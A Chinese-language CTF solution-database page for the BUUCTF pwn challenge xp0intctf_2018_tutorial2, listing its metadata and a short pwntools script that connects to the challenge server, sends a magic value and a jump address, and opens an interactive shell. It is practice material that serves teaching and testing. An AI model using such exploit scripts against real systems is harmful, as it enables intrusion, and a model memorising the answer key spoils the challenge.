[随波逐流]CTF Flags

随波逐流信息安全网 www.1o1o.xyz

   [随波逐流]CTF Flags

软件版本:v1.0.0   数据版本: v20260201
返    回

xp0intctf_2018_tutorial2

 广告模块
ID: 8780
标题: xp0intctf_2018_tutorial2
描述: Ubuntu 18 https://github.com/hebtuerror404
类型: Pwn
网站: BUUCTF
题目链接: https://buuoj.cn/challenges#xp0intctf_2018_tutorial2
赛事: None
年度: None
Flag值: xp0intctf_2018_tutorial2的解题脚本为: from pwn import * context(log_level='debug') io=remote("node3.buuoj.cn",26963) io.recv() io.send(p32(0xdeadbeef)) io.recv() io.send(p32(0x4006e6)) io.recv() io.interactive()
writeup: https://blog.csdn.net/stareforever/article/details/114629192
答案错误,我要更正